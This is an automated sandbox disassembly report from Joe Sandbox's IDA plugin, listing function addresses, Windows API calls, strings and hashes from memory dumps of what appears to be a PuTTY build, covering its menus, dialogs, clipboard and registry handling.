Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: AddressCurrentExplicitModelProcProcessUser
String ID: SetCurrentProcessExplicitAppUserModelID$Shell32.dll
API String ID: 3773935857-666802935
Opcode ID: c737a0d3d49e81ffd763e0349d78d59d3c54a14abda206d154b8dcd525620234
Instruction ID: dcd1ef07cd808a356bdb238b3a2ca8ec0e2a8b668ac2b6883357b1d46118ff84
Opcode Fuzzy Hash: c737a0d3d49e81ffd763e0349d78d59d3c54a14abda206d154b8dcd525620234
Instruction Fuzzy Hash: 51E0ED78610303DBDB24AF366DCAB3636986B11785B864064B421D2260EF64C944FE3A

Uniqueness

Uniqueness Score: -1.00%

Function 00C7BC00 Relevance: 6.1, APIs: 4, Instructions: 72
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00C7BC76
RegOpenKeyExA.KERNELBASE(?,?,00000000,0002001F), ref: 00C7BC9A
RegCloseKey.ADVAPI32(?), ref: 00C7BCA6
RegCloseKey.ADVAPI32(?), ref: 00C7BCBA

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Close$CreateOpen
String ID:
API String ID: 1299239824-0
Opcode ID: 50540ea1ca994e2971199728d7e4b3ce3677d193a297ed28683465914557d578
Instruction ID: b876049ef6a1be2641cd15c5bd83306a1fb32e3bf244e278fbc11bc0676d5db9
Opcode Fuzzy Hash: 50540ea1ca994e2971199728d7e4b3ce3677d193a297ed28683465914557d578
Instruction Fuzzy Hash: 2B11B130344301ABE3218B25DD46B7BBBE8AF85B94F15C01DF95D9B380CB70AD00DA66

Uniqueness

Uniqueness Score: -1.00%

Function 00C5D6E0 Relevance: 6.0, APIs: 4, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDialogParamA.USER32(0000006F,00000000,00C5D720,00000000,?), ref: 00C5D6F2
ShowWindow.USER32(00000000,00000000), ref: 00C5D6FD
SetActiveWindow.USER32(00000000), ref: 00C5D704
KiUserCallbackDispatcher.NTDLL(00000000), ref: 00C5D70B

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Window$ActiveCallbackCreateDialogDispatcherParamShowUser
String ID:
API String ID: 916146323-0
Opcode ID: 97c5a40dfa5860148b540097de12433805c16d1ff41cf318f9918d0f877a9109
Instruction ID: 2507a829279e5fb097d2d34e798f61e9cf10d6e6701447bf69099ee3121d64dc
Opcode Fuzzy Hash: 97c5a40dfa5860148b540097de12433805c16d1ff41cf318f9918d0f877a9109
Instruction Fuzzy Hash: 97D09E75141710BBD6612B60BC0EF993E56EB0D752F104110FA03E52E487B51551CEB9

Uniqueness

Uniqueness Score: -1.00%

Function 00C63780 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetDlgItemTextA.USER32(?,?,00000000), ref: 00C6380C

Strings

false && "bad control type in label_change", xrefs: 00C63848
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c, xrefs: 00C637C5, 00C63843

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ItemText
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c$false && "bad control type in label_change"
API String ID: 3367045223-1645433261
Opcode ID: 73f9a8ee227d11d61e22164a8c8dd5a6c508d8306abbf0825f5d4f72588632c5
Instruction ID: b2ff3f88756d26aa6244c1b844d27b63281d491a5c40834edac4ba6ce93fdd3b
Opcode Fuzzy Hash: 73f9a8ee227d11d61e22164a8c8dd5a6c508d8306abbf0825f5d4f72588632c5
Instruction Fuzzy Hash: 072132B2A00280AFC7309E24DEC2A0A37E2DFC6750F1A0129F81893382D731EE04DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C63280 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendDlgItemMessageA.USER32(?,?,00000143,00000000,?), ref: 00C63307

Strings

c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00C632CC
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c, xrefs: 00C632C7

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
API String ID: 3015471070-2774982218
Opcode ID: 904c3c2d8d489790cb24f3b573fba5f67294fa31b0eba26262e02ea0fc213909
Instruction ID: 3ddcf0475d3b936e0fecbfc95368f824cba79433a5cde666621d6f3d040d961a
Opcode Fuzzy Hash: 904c3c2d8d489790cb24f3b573fba5f67294fa31b0eba26262e02ea0fc213909
Instruction Fuzzy Hash: 8E11EDB1700305AFEB308B04DCE5B26B3E5EB8A310F10412AF50A876A2D771AE54CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C63020 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetDlgItemTextA.USER32(?,?,?), ref: 00C6309A

Strings

c && c->ctrl->type == CTRL_EDITBOX, xrefs: 00C63083
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c, xrefs: 00C6307E

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ItemText
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c$c && c->ctrl->type == CTRL_EDITBOX
API String ID: 3367045223-4089354181
Opcode ID: 310969dd86d0d6bb9372e363f4327437b26c6d78d095eb6def7159eeb9212e8b
Instruction ID: 0f185fd385e3ed1ad303fe7e237d0d811878ac7a2e14c3f368a6cea5059540cf
Opcode Fuzzy Hash: 310969dd86d0d6bb9372e363f4327437b26c6d78d095eb6def7159eeb9212e8b
Instruction Fuzzy Hash: 49018B32604205EFD620CE19E8C6E1AB3A8FB8A748F010025F914A3212D372AE18DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CF62C4 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,?,00CF38E0,00000001,00000364,?,00000006,000000FF,?,00CEDB13,00000003,?,?,00C7B059), ref: 00CF6305

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 724ba35bd45a25e34ae0739f6919a3d6847b8024b3d8fa3fa7d955f1413de0c1
Instruction ID: 26f63686472feb5d89d903fd93609b1052f17b0a58e7bb1bedaec19fd9bfda95
Opcode Fuzzy Hash: 724ba35bd45a25e34ae0739f6919a3d6847b8024b3d8fa3fa7d955f1413de0c1
Instruction Fuzzy Hash: AAF0E272A0462CA7DFA15F27AC41BBB3758AF41760B158522EA29DB1A0DE20DD0196E2

Uniqueness

Uniqueness Score: -1.00%

Function 00CF5061 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00CF435B,19E850E8,?,00CF435B,00000220,?,00CEE284,19E850E8), ref: 00CF5093

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a31a478dfadc63812ae1d8484d7daaede3fe07e1a343889c7e13250c177761b4
Instruction ID: c5b141d2391ee4ef15afb300386a9d005aa74b5f88695c840a245925a6a4e094
Opcode Fuzzy Hash: a31a478dfadc63812ae1d8484d7daaede3fe07e1a343889c7e13250c177761b4
Instruction Fuzzy Hash: 76E02B71101B1C9BD7712B769C01B7B3A48AF413B0F110121FF2AD6685DF20CD0195E7

Uniqueness

Uniqueness Score: -1.00%

Function 00C7BAA0 Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA7510: GetSystemDirectoryA.KERNEL32(00000000,?), ref: 00CA7522
Part of subcall function 00CA7510: GetSystemDirectoryA.KERNEL32(00000000), ref: 00CA7566

Part of subcall function 00C78670: _strlen.LIBCMT ref: 00C78687
Part of subcall function 00C78670: _strlen.LIBCMT ref: 00C786B1
Part of subcall function 00C78670: _strlen.LIBCMT ref: 00C786E5
Part of subcall function 00C78670: _strlen.LIBCMT ref: 00C7870B

LoadLibraryA.KERNELBASE(00000000,00000000,?,00C89C90,kernel32.dll), ref: 00C7BABF

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _strlen$DirectorySystem$LibraryLoad
String ID:
API String ID: 2116201098-0
Opcode ID: 31ab2de3675acaee374c238b0a4757968f71b5f4e256c64b10bfa725216a9372
Instruction ID: 9998c50d550d743d1a952b33e81fc32a41d342d4240bdfc9235017566ad1da49
Opcode Fuzzy Hash: 31ab2de3675acaee374c238b0a4757968f71b5f4e256c64b10bfa725216a9372
Instruction Fuzzy Hash: 08D05EA6E482203BEA1032387C0EE6B265CCF96365F094964F908E7242F931AD0482F2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00C448D7 Relevance: 124.9, APIs: 52, Strings: 19, Instructions: 698windowtimeCOMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00C449D1
GetClientRect.USER32(00000000,?), ref: 00C449DD
CreateWindowExW.USER32(?,00000000,00D27F58,00D27F58,80000000,80000000,?,?,00000000,00000000,?,00000000), ref: 00C44B01
GetLastError.KERNEL32 ref: 00C44B10
GetDC.USER32 ref: 00C44BC3
GetDeviceCaps.GDI32(00000000,00000058), ref: 00C44BD4
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C44BDE
ReleaseDC.USER32(00000000), ref: 00C44BEC
GetWindowRect.USER32(?), ref: 00C44D65
GetClientRect.USER32(?), ref: 00C44D76
SetWindowPos.USER32(00000000,00000000,00000000,?,?,0000000E), ref: 00C44E00
CreateBitmap.GDI32(00000001,00000001,00000000), ref: 00C44E4F
CreateCaret.USER32 ref: 00C44E7B
SetScrollInfo.USER32(00000001,?,00000000), ref: 00C44EC2
GetDoubleClickTime.USER32 ref: 00C44EDC
GetSystemMenu.USER32(00000000), ref: 00C44EEF
CreatePopupMenu.USER32 ref: 00C44EFA
AppendMenuA.USER32(00000000,00000000,00000190,&Copy), ref: 00C44F18
AppendMenuA.USER32(00000000,000001A0,&Paste), ref: 00C44F2C
CreateMenu.USER32 ref: 00C44F2E
DeleteMenu.USER32(00000000,00000400), ref: 00C44F5D
AppendMenuA.USER32(00000000,00001000,?), ref: 00C44F91
AppendMenuA.USER32(00000001,00001000,(No sessions)), ref: 00C44FC6
AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00C4502D
AppendMenuA.USER32(?,00000000,00000010,&Event Log), ref: 00C45039
AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00C45045
AppendMenuA.USER32(?,00000000,00000020,Ne&w Session...), ref: 00C45051
AppendMenuA.USER32(?,00000000,00000030,&Duplicate Session), ref: 00C4505D
AppendMenuA.USER32(?,00000010,Sa&ved Sessions), ref: 00C4506D
AppendMenuA.USER32(?,00000000,00000050,Chan&ge Settings...), ref: 00C45079
AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00C45085
AppendMenuA.USER32(?,00000000,00000170,C&opy All to Clipboard), ref: 00C45094
AppendMenuA.USER32(?,00000000,00000060,C&lear Scrollback), ref: 00C450A0
AppendMenuA.USER32(?,00000000,00000070,Rese&t Terminal), ref: 00C450AC
AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00C450B8

Strings

(, xrefs: 00C4499B
&Help, xrefs: 00C450F9
Chan&ge Settings..., xrefs: 00C4506F
Unable to create terminal window: %s, xrefs: 00C44B20
&Full Screen, xrefs: 00C450D2
&Paste, xrefs: 00C44F1A
Running with restricted process ACL, xrefs: 00C4511B
Rese&t Terminal, xrefs: 00C450A2
(No sessions), xrefs: 00C44FB4
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/window.c, xrefs: 00C44C82
C&lear Scrollback, xrefs: 00C45096
&About %s, xrefs: 00C44FE6
Sa&ved Sessions, xrefs: 00C4505F
C&opy All to Clipboard, xrefs: 00C45087
&Event Log, xrefs: 00C4502F
&Duplicate Session, xrefs: 00C45053
Ne&w Session..., xrefs: 00C45047
term->mouse_select_clipboards[0] == CLIP_LOCAL, xrefs: 00C44C87
&Copy, xrefs: 00C44F0B

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Menu$Append$Create$Window$Rect$CapsClientDevice$BitmapCaretClickDeleteDesktopDoubleErrorInfoLastPopupReleaseScrollSystemTime
String ID: &About %s$&Copy$&Duplicate Session$&Event Log$&Full Screen$&Help$&Paste$($(No sessions)$/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/window.c$C&lear Scrollback$C&opy All to Clipboard$Chan&ge Settings...$Ne&w Session...$Rese&t Terminal$Running with restricted process ACL$Sa&ved Sessions$Unable to create terminal window: %s$term->mouse_select_clipboards[0] == CLIP_LOCAL
API String ID: 662650409-4282124222
Opcode ID: 191344973fbcc0ce62b7443cfffb39bb94f0937e3ace5b69d418a1a0b254ba04
Instruction ID: 00e3b88bb89312e708d46f23406f4d5f5fbbd2cf5a9e2bdd102fb29e91498e4d
Opcode Fuzzy Hash: 191344973fbcc0ce62b7443cfffb39bb94f0937e3ace5b69d418a1a0b254ba04
Instruction Fuzzy Hash: 0732A3B9680300EFE7109F20EC46F6A3BA5FB46745F144028FA05E63E2D7B1A954DB75

Uniqueness

Uniqueness Score: -1.00%

Function 00C47490 Relevance: 77.9, APIs: 28, Strings: 16, Instructions: 851clipboardmemorywindowCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00C474D4
GlobalAlloc.KERNEL32(00002002,?), ref: 00C474EA
GlobalAlloc.KERNEL32(00002002,00000000), ref: 00C474F8
GlobalLock.KERNEL32(00000000), ref: 00C4750D
GlobalLock.KERNEL32(00000000), ref: 00C4751E
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 00C47565
GlobalFree.KERNEL32(00000000), ref: 00C47626
GlobalFree.KERNEL32(00000000), ref: 00C47635
GlobalUnlock.KERNEL32(00000000), ref: 00C476C5
GlobalFree.KERNEL32(00000000), ref: 00C476D2
GlobalFree.KERNEL32(00000000), ref: 00C476D5
GlobalUnlock.KERNEL32(00000000), ref: 00C47F32
GlobalUnlock.KERNEL32(?), ref: 00C47F39
SendMessageA.USER32(00008002,00000001,00000000), ref: 00C47F4E
OpenClipboard.USER32 ref: 00C47F5A
EmptyClipboard.USER32 ref: 00C47F64
SetClipboardData.USER32(0000000D,00000000), ref: 00C47F73
SetClipboardData.USER32(00000001,?), ref: 00C47F78
RegisterClipboardFormatA.USER32(Rich Text Format), ref: 00C47F86
SetClipboardData.USER32(00000000,?), ref: 00C47F8E
CloseClipboard.USER32 ref: 00C47F94
SendMessageA.USER32(00008002,00000000,00000000), ref: 00C47FC2

Strings

\b , xrefs: 00C47C72, 00C47C83
\cf%d , xrefs: 00C47B8B, 00C47BBD
{\uc%d\u%d, xrefs: 00C47D62
Rich Text Format, xrefs: 00C47F81
\par, xrefs: 00C47DE2
\highlight%d , xrefs: 00C47C14, 00C47C42
\ulnone , xrefs: 00C47CAD
\'%02x, xrefs: 00C47E46
\red%d\green%d\blue%d;, xrefs: 00C47899, 00C478E2
tindex + multilen <= len2, xrefs: 00C47DA1
}, xrefs: 00C47D79
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/window.c, xrefs: 00C47D9C
\b0 , xrefs: 00C47C77
{\colortbl ;, xrefs: 00C47858
{\rtf1\ansi\deff0{\fonttbl\f0\fmodern %s;}\f0\fs%d, xrefs: 00C475CD
\ul , xrefs: 00C47CA8, 00C47CB6

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Global$Clipboard$Free$DataUnlock$AllocByteCharLockMessageMultiSendWide$CloseEmptyFormatOpenRegister
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/window.c$Rich Text Format$\'%02x$\b $\b0 $\cf%d $\highlight%d $\par$\red%d\green%d\blue%d;$\ul $\ulnone $tindex + multilen <= len2${\colortbl ;${\rtf1\ansi\deff0{\fonttbl\f0\fmodern %s;}\f0\fs%d${\uc%d\u%d$}
API String ID: 2045886889-3716057650
Opcode ID: d1032dacd8ada770d7cb8c5975fcd0f8ed0005519704bfdc6b58321ad64c65fe
Instruction ID: 83046a134270e372f6b490ca0f20b9652b71fdcffd4f0aecf5c3be06911ca676
Opcode Fuzzy Hash: d1032dacd8ada770d7cb8c5975fcd0f8ed0005519704bfdc6b58321ad64c65fe
Instruction Fuzzy Hash: 0C5214B190C340AFD7209F24DC45B6BBBE6BB84314F144A2CF9A9972D1E7719D04DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C607F0 Relevance: 54.1, APIs: 12, Strings: 18, Instructions: 1584COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00C60EC7

Strings

ret == c, xrefs: 00C608A0, 00C60973, 00C609A1, 00C618EA, 00C61918
(ctrl->columns.ncols == 1) ^ (ncols == 1), xrefs: 00C60A99
ntabdelays < lenof(tabdelays), xrefs: 00C60D51
ncols <= lenof(columns), xrefs: 00C60AD4
COMBOBOX, xrefs: 00C6148E, 00C61812, 00C61C2A, 00C61C75
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c, xrefs: 00C6089B, 00C6096E, 00C6099C, 00C60A94, 00C60ACF, 00C60C4B, 00C60D4C, 00C60DFD, 00C610A6, 00C618E5, 00C61913, 00C6196C, 00C619D2, 00C619FC, 00C61AD1, 00C61AFB, 00C61E94
EDIT, xrefs: 00C6153D, 00C61838
win, xrefs: 00C61A01, 00C61B00
nshortcuts < MAX_SHORTCUTS_PER_CTRL, xrefs: 00C610AB
!ctrl->delay_taborder, xrefs: 00C60C50
false && "bad control type in winctrl_layout", xrefs: 00C61E99
i < ntabdelays, xrefs: 00C60E02
ud, xrefs: 00C611FA
!dp->shortcuts[s], xrefs: 00C61971
LISTBOX, xrefs: 00C61615
thisc, xrefs: 00C619D7, 00C61AD6
STATIC, xrefs: 00C609CD, 00C60FBB, 00C61467, 00C614E4, 00C615C5, 00C61754, 00C617CF, 00C61BFF
BUTTON, xrefs: 00C610EF, 00C6116D, 00C61E5F

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _strlen
String ID: !ctrl->delay_taborder$!dp->shortcuts[s]$(ctrl->columns.ncols == 1) ^ (ncols == 1)$/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c$BUTTON$COMBOBOX$EDIT$LISTBOX$STATIC$false && "bad control type in winctrl_layout"$i < ntabdelays$ncols <= lenof(columns)$nshortcuts < MAX_SHORTCUTS_PER_CTRL$ntabdelays < lenof(tabdelays)$ret == c$thisc$ud$win
API String ID: 4218353326-3115391464
Opcode ID: f613a7f67f5f791233bb255e24245a3891f55902b01cca2368d48ad5e67a742f
Instruction ID: a338f9adb0cd76dc82a6c659eef8c93b24fe1e3a15c6dcac9bf5b601a386f28d
Opcode Fuzzy Hash: f613a7f67f5f791233bb255e24245a3891f55902b01cca2368d48ad5e67a742f
Instruction Fuzzy Hash: DBC2E271A08301AFD720DF15CC81B6BB7E5AF84705F18892CF99997392E771EA44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C61F80 Relevance: 48.1, APIs: 21, Strings: 6, Instructions: 828windowregistryclipboardCOMMON

Download Yara Rule

APIs

RegisterClipboardFormatA.USER32(commctrl_DragListMsg), ref: 00C61FB3
SetMapMode.GDI32(?,00000001), ref: 00C62057
_strlen.LIBCMT ref: 00C62061
GetTextExtentPoint32A.GDI32(?,?,00000000,?), ref: 00C62074
DrawEdge.USER32(?,00000006,00000006,0000200F), ref: 00C62087
_strlen.LIBCMT ref: 00C62091
TextOutA.GDI32(?,?,?,?,00000000), ref: 00C620D9
GetDC.USER32(00000000), ref: 00C62458
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C62463
MulDiv.KERNEL32(?,00000000,00000048), ref: 00C6246F
ReleaseDC.USER32(00000000,00000000), ref: 00C62481
_strncpy.LIBCMT ref: 00C624F6
ChooseFontA.COMDLG32 ref: 00C62535
IsDlgButtonChecked.USER32(?,?), ref: 00C62634
SendDlgItemMessageA.USER32(?,?,00000147,00000000,00000000), ref: 00C62875
SendDlgItemMessageA.USER32(?,?,00000148,00000000,00000000), ref: 00C628BE
SetDlgItemTextA.USER32(?,?,00000000), ref: 00C628D5
SetCapture.USER32(?), ref: 00C62A02
ChooseColorA.COMDLG32(00D42294), ref: 00C62AA6
GetDlgItemTextA.USER32(00000000,?,?,00000104), ref: 00C62AFA
SetDlgItemTextA.USER32(?,?), ref: 00C62BA3

Strings

All Files (*.*), xrefs: 00C62739
commctrl_DragListMsg, xrefs: 00C61FAE
!c->data, xrefs: 00C62B66
